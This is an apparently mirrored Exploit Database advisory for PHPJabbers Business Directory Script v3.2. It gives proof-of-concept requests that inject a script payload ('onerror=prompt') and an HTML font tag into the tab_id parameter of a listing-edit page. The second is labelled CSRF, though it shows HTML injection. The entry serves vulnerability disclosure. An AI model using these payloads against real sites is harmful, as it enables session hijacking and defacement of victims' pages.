PHPJabbers Business Directory Script v3.2 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： Kerimcan Ozturk
  日期： 2023-08-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51687/

• # Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
  # Date: 09/08/2023
  # Exploit Author: Kerimcan Ozturk
  # Vendor Homepage: https://www.phpjabbers.com/
  # Software Link: https://www.phpjabbers.com/business-directory-script/
  # Version: 3.2
  # Tested on: Windows 10 Pro
  ## Description
  
  Technical Detail / POC
  ==========================
  Login Account
  Go to Property Page (
  https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
  Edit Any Property (
  https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57
  )
  
  [1] Cross-Site Scripting (XSS)
  
  Request:
  https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
  "<script><image/src/onerror=prompt(8)>
  
  [2] Cross-Site Request Forgery
  
  Request:
  https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=
  "<script><font%20color="green">Kerimcan%20Ozturk</font>
  
  Best Regards